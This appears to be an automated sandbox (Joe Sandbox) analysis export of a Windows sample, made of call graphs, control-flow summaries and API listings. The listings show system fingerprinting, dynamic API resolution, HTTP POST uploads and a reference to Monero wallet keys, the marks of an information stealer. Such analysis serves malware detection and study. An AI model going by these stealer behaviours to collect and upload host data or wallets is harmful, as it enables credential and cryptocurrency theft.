15021 cca8a0 lstrcpy 15020->15021 15022 cc1dcf 15021->15022 15023 cca9b0 4 API calls 15022->15023 15024 cc1df0 15023->15024 15025 cca8a0 lstrcpy 15024->15025 15026 cc1df9 15025->15026 15687 cc7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15026->15687 15029 cca9b0 4 API calls 15030 cc1e19 15029->15030 15031 cca8a0 lstrcpy 15030->15031 15032 cc1e22 15031->15032 15033 cca9b0 4 API calls 15032->15033 15034 cc1e41 15033->15034 15035 cca8a0 lstrcpy 15034->15035 15036 cc1e4a 15035->15036 15037 cca9b0 4 API calls 15036->15037 15038 cc1e6b 15037->15038 15039 cca8a0 lstrcpy 15038->15039 15040 cc1e74 15039->15040 15689 cc7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15040->15689 15043 cca9b0 4 API calls 15044 cc1e94 15043->15044 15045 cca8a0 lstrcpy 15044->15045 15046 cc1e9d 15045->15046 15047 cca9b0 4 API calls 15046->15047 15048 cc1ebc 15047->15048 15049 cca8a0 lstrcpy 15048->15049 15050 cc1ec5 15049->15050 15051 cca9b0 4 API calls 15050->15051 15052 cc1ee5 15051->15052 15053 cca8a0 lstrcpy 15052->15053 15054 cc1eee 15053->15054 15692 cc7b00 GetUserDefaultLocaleName 15054->15692 15057 cca9b0 4 API calls 15058 cc1f0e 15057->15058 15059 cca8a0 lstrcpy 15058->15059 15060 cc1f17 15059->15060 15061 cca9b0 4 API calls 15060->15061 15062 cc1f36 15061->15062 15063 cca8a0 lstrcpy 15062->15063 15064 cc1f3f 15063->15064 15065 cca9b0 4 API calls 15064->15065 15066 cc1f60 15065->15066 15067 cca8a0 lstrcpy 15066->15067 15068 cc1f69 15067->15068 15696 cc7b90 15068->15696 15070 cc1f80 15071 cca920 3 API calls 15070->15071 15072 cc1f93 15071->15072 15073 cca8a0 lstrcpy 15072->15073 15074 cc1f9c 15073->15074 15075 cca9b0 4 API calls 15074->15075 15076 cc1fc6 15075->15076 15077 cca8a0 lstrcpy 15076->15077 15078 cc1fcf 15077->15078 15079 cca9b0 4 API calls 15078->15079 15080 cc1fef 15079->15080 15081 cca8a0 lstrcpy 15080->15081 15082 cc1ff8 15081->15082 15708 cc7d80 GetSystemPowerStatus 15082->15708 15085 cca9b0 4 API calls 15086 cc2018 15085->15086 15087 cca8a0 
lstrcpy 15086->15087 15088 cc2021 15087->15088 15089 cca9b0 4 API calls 15088->15089 15090 cc2040 15089->15090 15091 cca8a0 lstrcpy 15090->15091 15092 cc2049 15091->15092 15093 cca9b0 4 API calls 15092->15093 15094 cc206a 15093->15094 15095 cca8a0 lstrcpy 15094->15095 15096 cc2073 15095->15096 15097 cc207e GetCurrentProcessId 15096->15097 15710 cc9470 OpenProcess 15097->15710 15100 cca920 3 API calls 15101 cc20a4 15100->15101 15102 cca8a0 lstrcpy 15101->15102 15103 cc20ad 15102->15103 15104 cca9b0 4 API calls 15103->15104 15105 cc20d7 15104->15105 15106 cca8a0 lstrcpy 15105->15106 15107 cc20e0 15106->15107 15108 cca9b0 4 API calls 15107->15108 15109 cc2100 15108->15109 15110 cca8a0 lstrcpy 15109->15110 15111 cc2109 15110->15111 15715 cc7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15111->15715 15114 cca9b0 4 API calls 15115 cc2129 15114->15115 15116 cca8a0 lstrcpy 15115->15116 15117 cc2132 15116->15117 15118 cca9b0 4 API calls 15117->15118 15119 cc2151 15118->15119 15120 cca8a0 lstrcpy 15119->15120 15121 cc215a 15120->15121 15122 cca9b0 4 API calls 15121->15122 15123 cc217b 15122->15123 15124 cca8a0 lstrcpy 15123->15124 15125 cc2184 15124->15125 15719 cc7f60 15125->15719 15128 cca9b0 4 API calls 15129 cc21a4 15128->15129 15130 cca8a0 lstrcpy 15129->15130 15131 cc21ad 15130->15131 15132 cca9b0 4 API calls 15131->15132 15133 cc21cc 15132->15133 15134 cca8a0 lstrcpy 15133->15134 15135 cc21d5 15134->15135 15136 cca9b0 4 API calls 15135->15136 15137 cc21f6 15136->15137 15138 cca8a0 lstrcpy 15137->15138 15139 cc21ff 15138->15139 15732 cc7ed0 GetSystemInfo wsprintfA 15139->15732 15142 cca9b0 4 API calls 15143 cc221f 15142->15143 15144 cca8a0 lstrcpy 15143->15144 15145 cc2228 15144->15145 15146 cca9b0 4 API calls 15145->15146 15147 cc2247 15146->15147 15148 cca8a0 lstrcpy 15147->15148 15149 cc2250 15148->15149 15150 cca9b0 4 API calls 15149->15150 15151 cc2270 15150->15151 15152 cca8a0 lstrcpy 15151->15152 15153 cc2279 15152->15153 15734 cc8100 GetProcessHeap 
RtlAllocateHeap 15153->15734 15156 cca9b0 4 API calls 15157 cc2299 15156->15157 15158 cca8a0 lstrcpy 15157->15158 15159 cc22a2 15158->15159 15160 cca9b0 4 API calls 15159->15160 15161 cc22c1 15160->15161 15162 cca8a0 lstrcpy 15161->15162 15163 cc22ca 15162->15163 15164 cca9b0 4 API calls 15163->15164 15165 cc22eb 15164->15165 15166 cca8a0 lstrcpy 15165->15166 15167 cc22f4 15166->15167 15740 cc87c0 15167->15740 15170 cca920 3 API calls 15171 cc231e 15170->15171 15172 cca8a0 lstrcpy 15171->15172 15173 cc2327 15172->15173 15174 cca9b0 4 API calls 15173->15174 15175 cc2351 15174->15175 15176 cca8a0 lstrcpy 15175->15176 15177 cc235a 15176->15177 15178 cca9b0 4 API calls 15177->15178 15179 cc237a 15178->15179 15180 cca8a0 lstrcpy 15179->15180 15181 cc2383 15180->15181 15182 cca9b0 4 API calls 15181->15182 15183 cc23a2 15182->15183 15184 cca8a0 lstrcpy 15183->15184 15185 cc23ab 15184->15185 15745 cc81f0 15185->15745 15187 cc23c2 15188 cca920 3 API calls 15187->15188 15189 cc23d5 15188->15189 15190 cca8a0 lstrcpy 15189->15190 15191 cc23de 15190->15191 15192 cca9b0 4 API calls 15191->15192 15193 cc240a 15192->15193 15194 cca8a0 lstrcpy 15193->15194 15195 cc2413 15194->15195 15196 cca9b0 4 API calls 15195->15196 15197 cc2432 15196->15197 15198 cca8a0 lstrcpy 15197->15198 15199 cc243b 15198->15199 15200 cca9b0 4 API calls 15199->15200 15201 cc245c 15200->15201 15202 cca8a0 lstrcpy 15201->15202 15203 cc2465 15202->15203 15204 cca9b0 4 API calls 15203->15204 15205 cc2484 15204->15205 15206 cca8a0 lstrcpy 15205->15206 15207 cc248d 15206->15207 15208 cca9b0 4 API calls 15207->15208 15209 cc24ae 15208->15209 15210 cca8a0 lstrcpy 15209->15210 15211 cc24b7 15210->15211 15753 cc8320 15211->15753 15213 cc24d3 15214 cca920 3 API calls 15213->15214 15215 cc24e6 15214->15215 15216 cca8a0 lstrcpy 15215->15216 15217 cc24ef 15216->15217 15218 cca9b0 4 API calls 15217->15218 15219 cc2519 15218->15219 15220 cca8a0 lstrcpy 15219->15220 15221 cc2522 15220->15221 15222 cca9b0 4 API calls 
15221->15222 15223 cc2543 15222->15223 15224 cca8a0 lstrcpy 15223->15224 15225 cc254c 15224->15225 15226 cc8320 17 API calls 15225->15226 15227 cc2568 15226->15227 15228 cca920 3 API calls 15227->15228 15229 cc257b 15228->15229 15230 cca8a0 lstrcpy 15229->15230 15231 cc2584 15230->15231 15232 cca9b0 4 API calls 15231->15232 15233 cc25ae 15232->15233 15234 cca8a0 lstrcpy 15233->15234 15235 cc25b7 15234->15235 15236 cca9b0 4 API calls 15235->15236 15237 cc25d6 15236->15237 15238 cca8a0 lstrcpy 15237->15238 15239 cc25df 15238->15239 15240 cca9b0 4 API calls 15239->15240 15241 cc2600 15240->15241 15242 cca8a0 lstrcpy 15241->15242 15243 cc2609 15242->15243 15789 cc8680 15243->15789 15245 cc2620 15246 cca920 3 API calls 15245->15246 15247 cc2633 15246->15247 15248 cca8a0 lstrcpy 15247->15248 15249 cc263c 15248->15249 15250 cc265a lstrlen 15249->15250 15251 cc266a 15250->15251 15252 cca740 lstrcpy 15251->15252 15253 cc267c 15252->15253 15254 cb1590 lstrcpy 15253->15254 15255 cc268d 15254->15255 15799 cc5190 15255->15799 15257 cc2699 15257->13689 15987 ccaad0 15258->15987 15260 cb5009 InternetOpenUrlA 15263 cb5021 15260->15263 15261 cb502a InternetReadFile 15261->15263 15262 cb50a0 InternetCloseHandle InternetCloseHandle 15264 cb50ec 15262->15264 15263->15261 15263->15262 15264->13693 15988 cb98d0 15265->15988 15267 cc0759 15268 cc077d 15267->15268 15269 cc0a38 15267->15269 15272 cc0799 StrCmpCA 15268->15272 15270 cb1590 lstrcpy 15269->15270 15271 cc0a49 15270->15271 16164 cc0250 15271->16164 15274 cc07a8 15272->15274 15299 cc0843 15272->15299 15276 cca7a0 lstrcpy 15274->15276 15278 cc07c3 15276->15278 15277 cc0865 StrCmpCA 15279 cc0874 15277->15279 15317 cc096b 15277->15317 15280 cb1590 lstrcpy 15278->15280 15281 cca740 lstrcpy 15279->15281 15282 cc080c 15280->15282 15285 cc0881 15281->15285 15283 cca7a0 lstrcpy 15282->15283 15286 cc0823 15283->15286 15284 cc099c StrCmpCA 15287 cc09ab 15284->15287 15306 cc0a2d 15284->15306 15288 cca9b0 4 API calls 15285->15288 15289 
cca7a0 lstrcpy 15286->15289 15290 cb1590 lstrcpy 15287->15290 15291 cc08ac 15288->15291 15292 cc083e 15289->15292 15293 cc09f4 15290->15293 15294 cca920 3 API calls 15291->15294 15991 cbfb00 15292->15991 15296 cca7a0 lstrcpy 15293->15296 15297 cc08b3 15294->15297 15300 cc0a0d 15296->15300 15298 cca9b0 4 API calls 15297->15298 15301 cc08ba 15298->15301 15299->15277 15302 cca7a0 lstrcpy 15300->15302 15304 cca8a0 lstrcpy 15301->15304 15303 cc0a28 15302->15303 16107 cc0030 15303->16107 15306->13697 15317->15284 15639 cca7a0 lstrcpy 15638->15639 15640 cb1683 15639->15640 15641 cca7a0 lstrcpy 15640->15641 15642 cb1695 15641->15642 15643 cca7a0 lstrcpy 15642->15643 15644 cb16a7 15643->15644 15645 cca7a0 lstrcpy 15644->15645 15646 cb15a3 15645->15646 15646->14520 15648 cb47c6 15647->15648 15649 cb4838 lstrlen 15648->15649 15673 ccaad0 15649->15673 15651 cb4848 InternetCrackUrlA 15652 cb4867 15651->15652 15652->14597 15654 cca740 lstrcpy 15653->15654 15655 cc8b74 15654->15655 15656 cca740 lstrcpy 15655->15656 15657 cc8b82 GetSystemTime 15656->15657 15658 cc8b99 15657->15658 15659 cca7a0 lstrcpy 15658->15659 15660 cc8bfc 15659->15660 15660->14612 15662 cca931 15661->15662 15663 cca988 15662->15663 15665 cca968 lstrcpy lstrcat 15662->15665 15664 cca7a0 lstrcpy 15663->15664 15666 cca994 15664->15666 15665->15663 15666->14616 15667->14730 15669 cb4eee 15668->15669 15670 cb9af9 LocalAlloc 15668->15670 15669->14618 15669->14621 15670->15669 15671 cb9b14 CryptStringToBinaryA 15670->15671 15671->15669 15672 cb9b39 LocalFree 15671->15672 15672->15669 15673->15651 15674->14740 15675->14881 15676->14883 15677->14891 15806 cc77a0 15678->15806 15681 cc1c1e 15681->14973 15682 cc76c6 RegOpenKeyExA 15683 cc7704 RegCloseKey 15682->15683 15684 cc76e7 RegQueryValueExA 15682->15684 15683->15681 15684->15683 15686 cc1c99 15685->15686 15686->14987 15688 cc1e09 15687->15688 15688->15029 15690 cc7a9a wsprintfA 15689->15690 15691 cc1e84 15689->15691 15690->15691 15691->15043 15693 cc7b4d 
15692->15693 15694 cc1efe 15692->15694 15813 cc8d20 LocalAlloc CharToOemW 15693->15813 15694->15057 15697 cca740 lstrcpy 15696->15697 15698 cc7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15697->15698 15707 cc7c25 15698->15707 15699 cc7d18 15701 cc7d1e LocalFree 15699->15701 15702 cc7d28 15699->15702 15700 cc7c46 GetLocaleInfoA 15700->15707 15701->15702 15703 cca7a0 lstrcpy 15702->15703 15706 cc7d37 15703->15706 15704 cca8a0 lstrcpy 15704->15707 15705 cca9b0 lstrcpy lstrlen lstrcpy lstrcat 15705->15707 15706->15070 15707->15699 15707->15700 15707->15704 15707->15705 15709 cc2008 15708->15709 15709->15085 15711 cc94b5 15710->15711 15712 cc9493 GetModuleFileNameExA CloseHandle 15710->15712 15713 cca740 lstrcpy 15711->15713 15712->15711 15714 cc2091 15713->15714 15714->15100 15716 cc7e68 RegQueryValueExA 15715->15716 15717 cc2119 15715->15717 15718 cc7e8e RegCloseKey 15716->15718 15717->15114 15718->15717 15720 cc7fb9 GetLogicalProcessorInformationEx 15719->15720 15721 cc7fd8 GetLastError 15720->15721 15724 cc8029 15720->15724 15730 cc8022 15721->15730 15731 cc7fe3 15721->15731 15725 cc89f0 2 API calls 15724->15725 15728 cc807b 15725->15728 15726 cc89f0 2 API calls 15727 cc2194 15726->15727 15727->15128 15729 cc8084 wsprintfA 15728->15729 15728->15730 15729->15727 15730->15726 15730->15727 15731->15720 15731->15727 15814 cc89f0 15731->15814 15817 cc8a10 GetProcessHeap RtlAllocateHeap 15731->15817 15733 cc220f 15732->15733 15733->15142 15735 cc89b0 15734->15735 15736 cc814d GlobalMemoryStatusEx 15735->15736 15737 cc8163 __aulldiv 15736->15737 15738 cc819b wsprintfA 15737->15738 15739 cc2289 15738->15739 15739->15156 15741 cc87fb GetProcessHeap RtlAllocateHeap wsprintfA 15740->15741 15743 cca740 lstrcpy 15741->15743 15744 cc230b 15743->15744 15744->15170 15746 cca740 lstrcpy 15745->15746 15750 cc8229 15746->15750 15747 cc8263 15749 cca7a0 lstrcpy 15747->15749 15748 cca9b0 lstrcpy lstrlen lstrcpy lstrcat 15748->15750 15751 cc82dc 15749->15751 15750->15747 
[Call-graph edge list; the rendered graph is not preserved in the text export. Nodes with API calls: cc835c RegOpenKeyExA; cc83f8 RegEnumKeyExA; cc843f wsprintfA RegOpenKeyExA; cc8485 RegCloseKey RegCloseKey; cc84c1 RegQueryValueExA; cc84fa lstrlen; cc856e RegQueryValueExA; cc8601 RegCloseKey; cc8613 RegCloseKey; cc86bc CreateToolhelp32Snapshot Process32First; cc86e8 Process32Next; cc875d CloseHandle; cc7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA; cc7765 RegQueryValueExA; cc7780 RegCloseKey; cc89f9 GetProcessHeap HeapFree; cb51fd InternetOpenA StrCmpCA; cb5192 lstrlen; cb5329 InternetConnectA; cb5359 HttpOpenRequestA; cb58b7 InternetCloseHandle; cb58c4 InternetCloseHandle; cc8ead CryptBinaryToStringA; cc8ece GetProcessHeap RtlAllocateHeap; cc8f05 CryptBinaryToStringA; cb668f VirtualAlloc; cb6743 VirtualAlloc; cb6ee6 VirtualFree; cb6f26 FreeLibrary; cb6a09 LoadLibraryA; cb6ba8 GetProcAddress; cc8a10 GetProcessHeap RtlAllocateHeap. Helper nodes: cca740, cca7a0, cca8a0, cb1590 lstrcpy; cca9b0 lstrcpy lstrlen lstrcpy lstrcat (4 API calls); cca920, cc8b60 (3 API calls); cc8de0, cb47b0, cc89f0 (2 API calls); cc8ea0 (4 API calls).]

                          Control-flow Graph (rendered graph not preserved in the text export; basic blocks with API calls): cc9860-cc9874 call cc9750; cc987a-cc9a8e call cc9780, GetProcAddress * 21; cc9a93-cc9af2 LoadLibraryA * 5; cc9af4-cc9b08 GetProcAddress; cc9b0d-cc9b14; cc9b16-cc9b41 GetProcAddress * 2; cc9b46-cc9b4d; cc9b4f-cc9b63 GetProcAddress; cc9b68-cc9b6f; cc9b71-cc9b84 GetProcAddress; cc9b89-cc9b90; cc9b92-cc9bbc GetProcAddress * 2; cc9bc1-cc9bc2.
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01892200), ref: 00CC98A1
                          • GetProcAddress.KERNEL32(74DD0000,01892380), ref: 00CC98BA
                          • GetProcAddress.KERNEL32(74DD0000,01892098), ref: 00CC98D2
                          • GetProcAddress.KERNEL32(74DD0000,01892188), ref: 00CC98EA
                          • GetProcAddress.KERNEL32(74DD0000,01892218), ref: 00CC9903
                          • GetProcAddress.KERNEL32(74DD0000,018999C0), ref: 00CC991B
                          • GetProcAddress.KERNEL32(74DD0000,018853F0), ref: 00CC9933
                          • GetProcAddress.KERNEL32(74DD0000,018852B0), ref: 00CC994C
                          • GetProcAddress.KERNEL32(74DD0000,018922F0), ref: 00CC9964
                          • GetProcAddress.KERNEL32(74DD0000,01892308), ref: 00CC997C
                          • GetProcAddress.KERNEL32(74DD0000,01892158), ref: 00CC9995
                          • GetProcAddress.KERNEL32(74DD0000,01892320), ref: 00CC99AD
                          • GetProcAddress.KERNEL32(74DD0000,018855B0), ref: 00CC99C5
                          • GetProcAddress.KERNEL32(74DD0000,01892230), ref: 00CC99DE
                          • GetProcAddress.KERNEL32(74DD0000,01892338), ref: 00CC99F6
                          • GetProcAddress.KERNEL32(74DD0000,018854B0), ref: 00CC9A0E
                          • GetProcAddress.KERNEL32(74DD0000,018920B0), ref: 00CC9A27
                          • GetProcAddress.KERNEL32(74DD0000,018920C8), ref: 00CC9A3F
                          • GetProcAddress.KERNEL32(74DD0000,01885390), ref: 00CC9A57
                          • GetProcAddress.KERNEL32(74DD0000,018920E0), ref: 00CC9A70
                          • GetProcAddress.KERNEL32(74DD0000,018854F0), ref: 00CC9A88
                          • LoadLibraryA.KERNEL32(01892398,?,00CC6A00), ref: 00CC9A9A
                          • LoadLibraryA.KERNEL32(018923B0,?,00CC6A00), ref: 00CC9AAB
                          • LoadLibraryA.KERNEL32(018923F8,?,00CC6A00), ref: 00CC9ABD
                          • LoadLibraryA.KERNEL32(01892428,?,00CC6A00), ref: 00CC9ACF
                          • LoadLibraryA.KERNEL32(018923C8,?,00CC6A00), ref: 00CC9AE0
                          • GetProcAddress.KERNEL32(75A70000,01892440), ref: 00CC9B02
                          • GetProcAddress.KERNEL32(75290000,01892410), ref: 00CC9B23
                          • GetProcAddress.KERNEL32(75290000,01892458), ref: 00CC9B3B
                          • GetProcAddress.KERNEL32(75BD0000,018923E0), ref: 00CC9B5D
                          • GetProcAddress.KERNEL32(75450000,018853B0), ref: 00CC9B7E
                          • GetProcAddress.KERNEL32(76E90000,01899B60), ref: 00CC9B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00CC9BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00CC9BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: d24d9dea38025bd7b1873b7ac6dda70bf704a27004f45f7d68400a0f94151dd3
                          • Instruction ID: d668cbe4d6a0208e0ebc91339732becdd559321a65aa26f6a4398890839499b5
                          • Opcode Fuzzy Hash: d24d9dea38025bd7b1873b7ac6dda70bf704a27004f45f7d68400a0f94151dd3
                          • Instruction Fuzzy Hash: 76A16DF55002419FD348EFABED88D7637F9E7C834170C853AA60DEB2A4D679A449CB12

                          Control-flow Graph (rendered graph not preserved in the text export; basic blocks with API calls): cb45c0-cb4695 RtlAllocateHeap; cb46a0-cb46a6; cb46ac-cb474a; cb474f-cb47a9 VirtualProtect.
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00CB479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CB4765, 00CB4734, 00CB462D, 00CB46C2, 00CB46B7, 00CB471E, 00CB4729, 00CB46CD, 00CB45D2, 00CB4622, 00CB473F, 00CB4713, 00CB45F3, 00CB475A, 00CB4678, 00CB45E8, 00CB4683, 00CB477B, 00CB466D, 00CB4657, 00CB4638, 00CB474F, 00CB4617, 00CB4643, 00CB45DD, 00CB46D8, 00CB45C7, 00CB46AC, 00CB4770, 00CB4662
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: "The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom." (the same string repeated 30 times, `$`-separated, one per xref listed above)
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 1e8416cec426005843d92b5f64df3203126f94e07a6bd91b6f2e96da12e39c55
                          • Instruction ID: 166ff739335318efe0360bd189cd1763d9c0b7f70e5e0527b3bcbb2c644ce4d7
                          • Opcode Fuzzy Hash: 1e8416cec426005843d92b5f64df3203126f94e07a6bd91b6f2e96da12e39c55
                          • Instruction Fuzzy Hash: 9041BD607CA704EBA67AB7AC9CCEB9D77565F87701FD07866AE44923C0CEB069004627

                          Control-flow Graph (rendered graph not preserved in the text export; basic blocks with API calls, helper calls omitted): cb4880-cb4942 call cca7a0, call cb47b0, call cca740 * 5, InternetOpenA, StrCmpCA; cb4944; cb494b-cb494f; cb4955-cb4acd call cc8b60 and string helpers, InternetConnectA; cb4ad3-cb4ad7; cb4ad9-cb4ae3; cb4ae5; cb4aef-cb4b22 HttpOpenRequestA; cb4b28-cb4e28 string helpers, call ccaad0, lstrlen, call ccaad0 * 2, lstrlen, call ccaad0, HttpSendRequestA; cb4e32-cb4e5c InternetReadFile; cb4e5e-cb4e65; cb4e67-cb4eb9 InternetCloseHandle, call cca800; cb4e69-cb4ea7 call cca9b0, call cca8a0, call cca800; cb4ebe-cb4ec5 InternetCloseHandle; cb4ecb-cb4ef3 InternetCloseHandle, call ccaad0, call cb9ac0; cb4ef5-cb4f2d call cca820, call cca9b0, call cca8a0, call cca800; cb4f32-cb4fa2 call cc8990 * 2, call cca7a0, call cca800 * 8.
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CB4915
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00CD0DDB,00000000,?,?,00000000,?,",00000000,?,0189E748), ref: 00CB4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CB4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CB4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CB4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00CB4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00CB4EC5
                          • HttpOpenRequestA.WININET(00000000,0189E668,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB4B15
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • InternetCloseHandle.WININET(00000000), ref: 00CB4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 5a4d35278add8402a864906efe28a8f33891583995a83e92d945afdcafab7ff3
                          • Instruction ID: 064c677ab7b29d8e1c5a8f615260acce56963d1c18873f752613d3b9fed8f54a
                          • Opcode Fuzzy Hash: 5a4d35278add8402a864906efe28a8f33891583995a83e92d945afdcafab7ff3
                          • Instruction Fuzzy Hash: DF12C77191021CABDB15EB90DC9AFEEB378AF54304F5041ADF10666091EF702F8ADB66
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00CC792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: edabedfb595271058d6fbec073ad4812d6ff9f71abc00a6b85f4e1746c312853
                          • Instruction ID: 8a7f1d90f612437ad61073a05029a855f81dd8bb67b1ee1230a12a74b6df73d9
                          • Opcode Fuzzy Hash: edabedfb595271058d6fbec073ad4812d6ff9f71abc00a6b85f4e1746c312853
                          • Instruction Fuzzy Hash: 130162B1904244EFC704DF99DD49FAABBB8F744B61F10426AE649A7280C37459048BA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00CB11B7), ref: 00CC7880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00CC789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
